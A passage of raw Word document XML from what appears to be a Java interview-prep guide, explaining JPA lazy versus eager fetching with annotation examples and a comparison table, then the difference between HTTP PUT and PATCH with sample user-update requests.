    </w:p>
    <w:p w14:paraId="52B32DC5"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r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When loading an Order entity, the associated Customer entity will only be fetched when you try to access order.getCustomer().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEFC8D1"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OneToMany(fetch = FetchType.LAZY)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF7C322"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rivate Set&lt;Order&gt; orders;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F05B496"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this case, the orders are fetched only when accessed in the code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EDB20A"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Eager Loading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D3F16B"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efinition</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In eager loading, related entities are loaded immediately along with the parent entity. The related entities are fetched in the same query or in a join query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE149CC"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Behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When the parent entity is fetched, the related entities are fetched at the same time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD8EC3B"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erformance</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Eager loading can lead to unnecessary database queries if you don’t need the related entities immediately, potentially causing performance issues like fetching more data than needed (e.g., "cartesian product problem").</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEB541A"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r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When loading an Order entity, the associated Customer entity will be fetched immediately with a join.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5206138E"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ManyToOne(fetch = FetchType.EAGER)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E290B92"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rivate Customer customer;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17ADC9D7"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this case, the Customer is fetched as soon as the Order is fetched.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012502DE" w14:textId="77777777" w:rsidR="00C6790E"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D7FD89B">
          <v:rect id="_x0000_i2605" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EBB640"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8"/>
        <w:gridCol w:w="4256"/>
        <w:gridCol w:w="3860"/>
      </w:tblGrid>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="014DF7BA" w14:textId="77777777" w:rsidTr="00C6790E">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04BB6030"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Aspect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2365D37C"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Lazy Loading</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="146EFF89"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Eager Loading</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="24095EB4" w14:textId="77777777" w:rsidTr="00C6790E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27253C97"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When related data is fetched</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A92322A"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lated data is fetched only when accessed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="359B5B46"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lated data is fetched immediately with the parent entity.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="19D197C4" w14:textId="77777777" w:rsidTr="00C6790E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1682E3CE"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erformance Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="366A0318"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Faster initial load but may result in multiple queries (N+1 problem).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C057E79"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lower initial load due to fetching all related data at once.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="5294A43D" w14:textId="77777777" w:rsidTr="00C6790E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18B7E956"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e Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="627F4562"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eful when related data is not always needed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4795A2D5"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eful when related data is always required.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="56D23123" w14:textId="77777777" w:rsidTr="00C6790E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B6D905A"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Fetch Type Annotation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25479E85"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OneToMany(fetch = FetchType.LAZY)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47991547"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OneToMany(fetch = FetchType.EAGER)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="46A24B19" w14:textId="77777777" w:rsidTr="00C6790E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58B3FE94"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atabase Queries</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C3A5F11"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May result in multiple queries (on-demand).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="365DC6D9"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ults in a single query or join query.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5B27D6DF"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Example Scenario:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226B0C38"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Lazy Loading</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You load a Customer and only load the Orders when the customer.getOrders() method is accessed. If you never access the orders, they won't be fetched.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC086B3"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lastRenderedPageBreak/>
        <w:t>Eager Loading</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You load a Customer, and the Orders are automatically loaded in the same query, even if you don't need the Orders in the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FC7060"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Best Practices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6FC35A"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Lazy Loading</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is recommended in cases where related entities are large and not always necessary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA6418A"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ager Loading</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> should be used when related entities are needed immediately or frequently, such as in scenarios where you always need the data (e.g., Order and Customer in an e-commerce system).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512D2FE9" w14:textId="77777777" w:rsidR="00C6790E" w:rsidRPr="00CE4B95" w:rsidRDefault="00C6790E" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">In conclusion, the choice between </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Lazy</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Eager</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> loading depends on the use case, performance considerations, and how frequently you access related entities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5CC199" w14:textId="3E541014"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87291E6">
          <v:rect id="_x0000_i2606" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B3A75D" w14:textId="066C4C53" w:rsidR="009D6DE9" w:rsidRPr="00CE4B95" w:rsidRDefault="000064A4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="615" w:name="_Toc196308095"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Difference between </w:t>
      </w:r>
      <w:r w:rsidR="00355F67" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>PUT</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00355F67" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>PATCH</w:t>
      </w:r>
      <w:r w:rsidR="009D6DE9" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="615"/>
    </w:p>
    <w:p w14:paraId="3FBACC4E" w14:textId="65935752" w:rsidR="00C6790E" w:rsidRPr="002C6305" w:rsidRDefault="00C6790E" w:rsidP="002C6305">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Difference between PUT and PATCH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3CA856"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UT</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>PATCH</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are both HTTP methods used to update resources on a server, but they differ in how they perform the update.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E12DE42" w14:textId="77777777" w:rsidR="00C6790E"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31BE640">
          <v:rect id="_x0000_i2607" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E55CEB"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PUT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2AA67F"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efinition</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>PUT</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> method is used to update a resource or create a new resource at a specific URI (Uniform Resource Identifier). When updating, the entire resource is replaced with the new data provided in the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65422B2E"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Behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: When you use </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>PUT</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, you send the complete representation of the resource. If the resource already exists, it is entirely replaced with the new data. If it doesn't exist, a new resource is created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367F63C5"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Idempotency</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PUT</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>idempotent</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, meaning that calling it multiple times with the same data will always result in the same outcome. The resource remains the same after the first call, regardless of how many times the request is repeated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50235129"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e Case</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used when you want to completely replace a resource or when you are sure that the entire resource needs to be updated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75ED6E81"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r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: To update a User resource, you would send the entire updated User data (e.g., name, email, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B5382F"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T /users/123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33393D84"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35F9ADA5"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id": 123,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468771BA"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name": "John Doe",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5522BDCB"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mail": "john.doe@example.com"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D7EAB1"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65348E3"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PATCH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24201C56"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efinition</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>PATCH</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> method is used for partial updates to an existing resource. It allows you to update only the fields that need modification, instead of sending the entire resource.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEBC9FC"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Behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: When you use </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>PATCH</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, you only send the specific fields that need to be updated. The server updates only the fields provided in the request, leaving the rest of the resource unchanged.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B0B1F9"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Idempotency</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PATCH</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not necessarily idempotent</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Repeating the same PATCH request may result in different outcomes depending on the implementation of the server and the data provided.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A866D0"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e Case</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used when you want to make partial updates to a resource, rather than replacing the entire resource.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7D0CBB"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r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: To update only the name of a User, you would send just the updated field.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5E5399"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ATCH /users/123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BA037B"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12243292"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name": "Jane Doe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B4B6F3"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CDB4CAF" w14:textId="77777777" w:rsidR="00C6790E"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05CF74D">
